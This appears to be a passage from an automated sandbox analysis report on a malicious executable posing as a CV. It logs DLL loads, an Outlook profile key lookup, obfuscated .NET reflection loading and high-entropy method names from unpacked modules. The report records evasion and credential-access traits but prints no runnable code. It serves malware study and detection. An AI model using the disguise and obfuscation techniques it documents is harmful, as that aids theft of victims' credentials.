Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: ieframe.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: mlang.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: winsqlite3.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: vaultcli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Section loaded: rasadhlp.dll			Jump to behavior

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\TSTheme.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Curriculum Vitae Catalina Munoz.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Curriculum Vitae Catalina Munoz.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000000.1377872255.0000000000B2E000.00000002.00000001.01000000.0000000E.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662366685.0000000000B2E000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: TSTheme.pdb source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661296507.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1457676756.0000000004D79000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1459524541.0000000004F20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Curriculum Vitae Catalina Munoz.exe, Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, TSTheme.exe, 0000000F.00000003.1457676756.0000000004D79000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1459524541.0000000004F20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: TSTheme.pdbGCTL source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661296507.00000000010D8000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Curriculum Vitae Catalina Munoz.exe, --.cs	.Net Code: _0003
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Hpb6sX0m5OuPGE34GK.cs	.Net Code: KJDEWMnueR System.Reflection.Assembly.Load(byte[])
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Hpb6sX0m5OuPGE34GK.cs	.Net Code: KJDEWMnueR System.Reflection.Assembly.Load(byte[])
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.74e0000.4.raw.unpack, LoginForm.cs	.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Hpb6sX0m5OuPGE34GK.cs	.Net Code: KJDEWMnueR System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 0_2_07515EF3 pushfd ; retf		0_2_07515F11
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 0_2_0789171A pushfd ; ret		0_2_0789171B
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 0_2_07891B2B pushfd ; ret		0_2_07891B2C
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 0_2_07891AEA pushfd ; ret		0_2_07891AEB
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 0_2_078915AD pushfd ; ret		0_2_078915AE
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 0_2_07891C38 pushfd ; ret		0_2_07891C39
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 0_2_07891852 pushfd ; ret		0_2_07891853
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_00418810 push eax; ret		2_2_004188B8
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0041885E push ss; ret		2_2_0041885F
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0041786E push edx; ret		2_2_004178EA
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_00417887 push edx; ret		2_2_004178EA
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_00417146 pushad ; retf		2_2_00417152
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_00401972 push esp; iretd		2_2_0040199A
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_00407131 push esi; iretd		2_2_00407132
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0040D1D7 push eax; iretd		2_2_0040D1D8
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0040718E push edi; ret		2_2_00407191
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0041CB51 push eax; iretd		2_2_0041CB5F
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0040735A pushfd ; retf		2_2_00407363
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_00403330 push eax; ret		2_2_00403332
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_004075C4 push es; ret		2_2_004075D6
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_00401625 push eax; iretd		2_2_0040165A
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_00414765 push esp; retf		2_2_00414768
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014C225F pushad ; ret		2_2_014C27F9
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014C27FA pushad ; ret		2_2_014C27F9
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F09AD push ecx; mov dword ptr [esp], ecx		2_2_014F09B6
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014C283D push eax; iretd		2_2_014C2858
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Code function: 14_2_04B9ED9A push es; ret		14_2_04B9EDAC
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Code function: 14_2_04BB0034 push ss; ret		14_2_04BB0035
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Code function: 14_2_04BA49AD push eax; iretd		14_2_04BA49AE
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Code function: 14_2_04BAE91C pushad ; retf		14_2_04BAE928
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Code function: 14_2_04B9E907 push esi; iretd		14_2_04B9E908

Source: Curriculum Vitae Catalina Munoz.exe

Static PE information: section name: .text entropy: 7.958472092801501

Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, YcnmxKNTnXA1NqQ4lc.cs	High entropy of concatenated method names: 'EDWD1NTw1o', 'u2vDZ6gOco', 'lmTDPwdoZ0', 'pF0DNQ5L9i', 'hCXDq9XnKA', 'GnWDO96N1n', 'wnMDfMbr5G', 'GJdD8X72nq', 'GINDLuNH1Q', 't9aDlRjyx1'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, fqlC8u2Z7YhPRjbrvX.cs	High entropy of concatenated method names: 'VkR8Us0dH1', 'N9q8cVQqQU', 'wOQ86dNNm2', 's0W8jKATyK', 'MD68nPWiFE', 'WFE8v0kDB5', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, xKQ2Y9wRQSIgGWTNfR.cs	High entropy of concatenated method names: 'KRN8axy1PY', 'a0Q8sdrS68', 'CHG8Dj9Vj4', 'YwY8SCAULe', 'zUM87YOl7e', 'wKv8G6VhTo', 'csn80X7GJv', 'bpn8YE4VRu', 'kBt8HgXJSM', 'rgc8e5otpt'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, qy5p5LUNIfQKmew1rq.cs	High entropy of concatenated method names: 'UXE7RO8d2c', 'A3g7sRQ1Or', 'S1P7SidSsw', 'x5i7G0e7Xm', 'dGl70x1nRS', 'ndYSQ22rrc', 'LsDS9b0BKH', 'XnYSTmQfMO', 'YPISwKqnLn', 'ztTS2vOWpw'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, qy1pqrEQ3sOEpt1qlE.cs	High entropy of concatenated method names: 'B3hyGxYXTB', 'xl3y0LAaaT', 'ATnyHXA1Nq', 'U4lyecSKVR', 'TlEyqCg8y5', 'S5LyONIfQK', 'KxOSUlpr0nrZV1sMRG', 'y85Ev9KhoPIn0pGxYK', 'aNuyyayrWo', 'LqwyIVfEmw'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, MJyjJtbGp98wUACFmA.cs	High entropy of concatenated method names: 'AM9GJmwIui', 'bc0GiIMXIQ', 'rNgGWrYPop', 'eZIG1DWdDp', 'udIGKVlbnD', 'Jw5GZFwG0r', 'zE5GoYbYhG', 'E5TGPKTFZX', 'GQXGN0n35L', 'kkxGmgZvdf'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, UvteRy33KIyyiyhRJn.cs	High entropy of concatenated method names: 'r75fH9rJNN', 'ugsfeYPthf', 'ToString', 'mfrfaMc9aR', 'iGSfsce0uN', 'WxXfDSBndn', 'K1afSF3Qli', 'NgZf71WTmu', 'shHfG2XTkI', 'jAYf0Oaejm'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, FAn5GI9Cb4yvKhVofj.cs	High entropy of concatenated method names: 'OyWfwDcRQ5', 'rbmf4djM1O', 'KW38rvDUlg', 'ANM8ysFOTl', 'G84fhD97tn', 'JMZfBZh3YQ', 'RwNfVcexTW', 'iFkfnjRgEy', 'TbKfumM9D0', 'otsfppi0Ab'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, nr5UVF4misg4mgdUAT.cs	High entropy of concatenated method names: 'hf6LyS7T2Z', 'OGKLImP2eA', 'JKALEiY1jx', 'b3wLaj6bU7', 'nAwLshJicE', 'An5LShjABT', 'yBfL73trGI', 'qpN8T93O82', 'Hyg8wjPDgr', 'eay82UlxUR'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, J9gH0fkhRdxeGx8H0l.cs	High entropy of concatenated method names: 'wl8Ga3f4fx', 'fGVGDOrcwj', 'RuWG75cpIu', 'VNL74GxkhL', 'Mxm7zgTx0n', 'BQMGrAB1kI', 'v38GyWqnT4', 'yO0Gdpdd4M', 'QEPGIrhFrN', 'Q92GEetj1b'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, iKVRBkmAjnMyg3lECg.cs	High entropy of concatenated method names: 'WHZSKv33HH', 'rxmSoHL0pR', 'v0QD6WdPPO', 'S1oDjUJGvo', 'K5DDvq62xJ', 'AChDMsHPNu', 'rACDk0wbhs', 'gH3Dx9wCp2', 'nO4DbEXWU3', 'XHdDCS2cjw'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, BRrrodyIpfJ2i78iZBd.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Hn0ln9m4HA', 'SotluUO4Cl', 'qp8lpSAfZx', 'eQal3diHfl', 'CADlQjkRdJ', 'JYml9gGv0N', 'yAAlTdUp1W'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, OQYqIHzI2WrTnxnHF2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RMULF0mU4s', 'A34LqTvXiH', 'fLVLOIZS3R', 'mTHLfVCpC7', 't4HL8opncR', 'urCLLmLqBE', 'YBWLlN1u43'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, BMWTCqVkjukBjFQf7X.cs	High entropy of concatenated method names: 'do4FPvEYXY', 'MT1FNbX2Pa', 'CSdFUaD4VR', 'NwcFc5oLr6', 'LmdFjsXHjo', 'LQaFv354TU', 'vusFkleL2G', 'FIAFxqycP6', 'pYlFCP0xcd', 'beDFhOsONA'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, OxYXTBPtl3LAaaTJsD.cs	High entropy of concatenated method names: 'qiEsnNLmos', 'OUjsuFLZuX', 'b16spA17UN', 'bE9s3a0CBS', 'xxssQgf7aa', 'mkqs9BL4Bu', 'qPasT3T539', 'UGlswgNXJb', 'hKAs2aCofv', 'uUYs4UVpW8'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, pwXeAKdFbkBqalm4Og.cs	High entropy of concatenated method names: 'rqKWmOsK6', 'upE1ygRjY', 'jDoZBVfO4', 'KuEoNuI4J', 'rlSNHXgf0', 'fShmaoHPl', 'KGcATmuYCWNneoNnPo', 'k7bkS21gHyNXXJB4kF', 'n6C8vaNZP', 'X2alTMvUf'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Qas3xdyra6RNyrO1vfP.cs	High entropy of concatenated method names: 'DjgLJokA79', 'KAFLiZAiJF', 'NlZLWidMy4', 'zxRL1vKMm4', 'H6oLKUm9Wg', 'x0jLZbMEhB', 'G5yLoBFpQ7', 'vtDLPH3bPm', 'rFALN0Q1MV', 'KUGLmZG6lC'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, i9NUHTnq1v8MTGavnG.cs	High entropy of concatenated method names: 'pZtqCRU0PN', 'r3DqBR737p', 'iHFqnn1uBt', 'lrMquytBk2', 'PejqcV4wIQ', 'w7Lq64LmAp', 'Bu4qj9yT6R', 'Bt2qvqpkk8', 'VfWqMFTyUL', 'hH1qkDao7f'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Hpb6sX0m5OuPGE34GK.cs	High entropy of concatenated method names: 's7KIR3bgyQ', 'fYXIacOyoF', 'HjfIst1RPh', 'mFEIDHBaiC', 'kF1ISjR86X', 'yGlI7QU7V0', 'uTcIGuKmkg', 'A1nI0jJwwf', 'K5PIYIRLvH', 'IiAIHOK4Cd'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, DvFq1CsmOfeYK5xheQ.cs	High entropy of concatenated method names: 'Dispose', 'HRNy2iNtIV', 'PWjdcZemIV', 'N1o55Jw110', 'QJKy4Q2Y9R', 'USIyzgGWTN', 'ProcessDialogKey', 'qRadrqlC8u', 'B7YdyhPRjb', 'avXdder5UV'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, YcnmxKNTnXA1NqQ4lc.cs	High entropy of concatenated method names: 'EDWD1NTw1o', 'u2vDZ6gOco', 'lmTDPwdoZ0', 'pF0DNQ5L9i', 'hCXDq9XnKA', 'GnWDO96N1n', 'wnMDfMbr5G', 'GJdD8X72nq', 'GINDLuNH1Q', 't9aDlRjyx1'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, fqlC8u2Z7YhPRjbrvX.cs	High entropy of concatenated method names: 'VkR8Us0dH1', 'N9q8cVQqQU', 'wOQ86dNNm2', 's0W8jKATyK', 'MD68nPWiFE', 'WFE8v0kDB5', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, xKQ2Y9wRQSIgGWTNfR.cs	High entropy of concatenated method names: 'KRN8axy1PY', 'a0Q8sdrS68', 'CHG8Dj9Vj4', 'YwY8SCAULe', 'zUM87YOl7e', 'wKv8G6VhTo', 'csn80X7GJv', 'bpn8YE4VRu', 'kBt8HgXJSM', 'rgc8e5otpt'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, qy5p5LUNIfQKmew1rq.cs	High entropy of concatenated method names: 'UXE7RO8d2c', 'A3g7sRQ1Or', 'S1P7SidSsw', 'x5i7G0e7Xm', 'dGl70x1nRS', 'ndYSQ22rrc', 'LsDS9b0BKH', 'XnYSTmQfMO', 'YPISwKqnLn', 'ztTS2vOWpw'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, qy1pqrEQ3sOEpt1qlE.cs	High entropy of concatenated method names: 'B3hyGxYXTB', 'xl3y0LAaaT', 'ATnyHXA1Nq', 'U4lyecSKVR', 'TlEyqCg8y5', 'S5LyONIfQK', 'KxOSUlpr0nrZV1sMRG', 'y85Ev9KhoPIn0pGxYK', 'aNuyyayrWo', 'LqwyIVfEmw'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, MJyjJtbGp98wUACFmA.cs	High entropy of concatenated method names: 'AM9GJmwIui', 'bc0GiIMXIQ', 'rNgGWrYPop', 'eZIG1DWdDp', 'udIGKVlbnD', 'Jw5GZFwG0r', 'zE5GoYbYhG', 'E5TGPKTFZX', 'GQXGN0n35L', 'kkxGmgZvdf'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, UvteRy33KIyyiyhRJn.cs	High entropy of concatenated method names: 'r75fH9rJNN', 'ugsfeYPthf', 'ToString', 'mfrfaMc9aR', 'iGSfsce0uN', 'WxXfDSBndn', 'K1afSF3Qli', 'NgZf71WTmu', 'shHfG2XTkI', 'jAYf0Oaejm'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, FAn5GI9Cb4yvKhVofj.cs	High entropy of concatenated method names: 'OyWfwDcRQ5', 'rbmf4djM1O', 'KW38rvDUlg', 'ANM8ysFOTl', 'G84fhD97tn', 'JMZfBZh3YQ', 'RwNfVcexTW', 'iFkfnjRgEy', 'TbKfumM9D0', 'otsfppi0Ab'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, nr5UVF4misg4mgdUAT.cs	High entropy of concatenated method names: 'hf6LyS7T2Z', 'OGKLImP2eA', 'JKALEiY1jx', 'b3wLaj6bU7', 'nAwLshJicE', 'An5LShjABT', 'yBfL73trGI', 'qpN8T93O82', 'Hyg8wjPDgr', 'eay82UlxUR'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, J9gH0fkhRdxeGx8H0l.cs	High entropy of concatenated method names: 'wl8Ga3f4fx', 'fGVGDOrcwj', 'RuWG75cpIu', 'VNL74GxkhL', 'Mxm7zgTx0n', 'BQMGrAB1kI', 'v38GyWqnT4', 'yO0Gdpdd4M', 'QEPGIrhFrN', 'Q92GEetj1b'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, iKVRBkmAjnMyg3lECg.cs	High entropy of concatenated method names: 'WHZSKv33HH', 'rxmSoHL0pR', 'v0QD6WdPPO', 'S1oDjUJGvo', 'K5DDvq62xJ', 'AChDMsHPNu', 'rACDk0wbhs', 'gH3Dx9wCp2', 'nO4DbEXWU3', 'XHdDCS2cjw'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, BRrrodyIpfJ2i78iZBd.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Hn0ln9m4HA', 'SotluUO4Cl', 'qp8lpSAfZx', 'eQal3diHfl', 'CADlQjkRdJ', 'JYml9gGv0N', 'yAAlTdUp1W'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, OQYqIHzI2WrTnxnHF2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RMULF0mU4s', 'A34LqTvXiH', 'fLVLOIZS3R', 'mTHLfVCpC7', 't4HL8opncR', 'urCLLmLqBE', 'YBWLlN1u43'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, BMWTCqVkjukBjFQf7X.cs	High entropy of concatenated method names: 'do4FPvEYXY', 'MT1FNbX2Pa', 'CSdFUaD4VR', 'NwcFc5oLr6', 'LmdFjsXHjo', 'LQaFv354TU', 'vusFkleL2G', 'FIAFxqycP6', 'pYlFCP0xcd', 'beDFhOsONA'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, OxYXTBPtl3LAaaTJsD.cs	High entropy of concatenated method names: 'qiEsnNLmos', 'OUjsuFLZuX', 'b16spA17UN', 'bE9s3a0CBS', 'xxssQgf7aa', 'mkqs9BL4Bu', 'qPasT3T539', 'UGlswgNXJb', 'hKAs2aCofv', 'uUYs4UVpW8'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, pwXeAKdFbkBqalm4Og.cs	High entropy of concatenated method names: 'rqKWmOsK6', 'upE1ygRjY', 'jDoZBVfO4', 'KuEoNuI4J', 'rlSNHXgf0', 'fShmaoHPl', 'KGcATmuYCWNneoNnPo', 'k7bkS21gHyNXXJB4kF', 'n6C8vaNZP', 'X2alTMvUf'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Qas3xdyra6RNyrO1vfP.cs	High entropy of concatenated method names: 'DjgLJokA79', 'KAFLiZAiJF', 'NlZLWidMy4', 'zxRL1vKMm4', 'H6oLKUm9Wg', 'x0jLZbMEhB', 'G5yLoBFpQ7', 'vtDLPH3bPm', 'rFALN0Q1MV', 'KUGLmZG6lC'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, i9NUHTnq1v8MTGavnG.cs	High entropy of concatenated method names: 'pZtqCRU0PN', 'r3DqBR737p', 'iHFqnn1uBt', 'lrMquytBk2', 'PejqcV4wIQ', 'w7Lq64LmAp', 'Bu4qj9yT6R', 'Bt2qvqpkk8', 'VfWqMFTyUL', 'hH1qkDao7f'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Hpb6sX0m5OuPGE34GK.cs	High entropy of concatenated method names: 's7KIR3bgyQ', 'fYXIacOyoF', 'HjfIst1RPh', 'mFEIDHBaiC', 'kF1ISjR86X', 'yGlI7QU7V0', 'uTcIGuKmkg', 'A1nI0jJwwf', 'K5PIYIRLvH', 'IiAIHOK4Cd'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, DvFq1CsmOfeYK5xheQ.cs	High entropy of concatenated method names: 'Dispose', 'HRNy2iNtIV', 'PWjdcZemIV', 'N1o55Jw110', 'QJKy4Q2Y9R', 'USIyzgGWTN', 'ProcessDialogKey', 'qRadrqlC8u', 'B7YdyhPRjb', 'avXdder5UV'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, YcnmxKNTnXA1NqQ4lc.cs	High entropy of concatenated method names: 'EDWD1NTw1o', 'u2vDZ6gOco', 'lmTDPwdoZ0', 'pF0DNQ5L9i', 'hCXDq9XnKA', 'GnWDO96N1n', 'wnMDfMbr5G', 'GJdD8X72nq', 'GINDLuNH1Q', 't9aDlRjyx1'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, fqlC8u2Z7YhPRjbrvX.cs	High entropy of concatenated method names: 'VkR8Us0dH1', 'N9q8cVQqQU', 'wOQ86dNNm2', 's0W8jKATyK', 'MD68nPWiFE', 'WFE8v0kDB5', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, xKQ2Y9wRQSIgGWTNfR.cs	High entropy of concatenated method names: 'KRN8axy1PY', 'a0Q8sdrS68', 'CHG8Dj9Vj4', 'YwY8SCAULe', 'zUM87YOl7e', 'wKv8G6VhTo', 'csn80X7GJv', 'bpn8YE4VRu', 'kBt8HgXJSM', 'rgc8e5otpt'
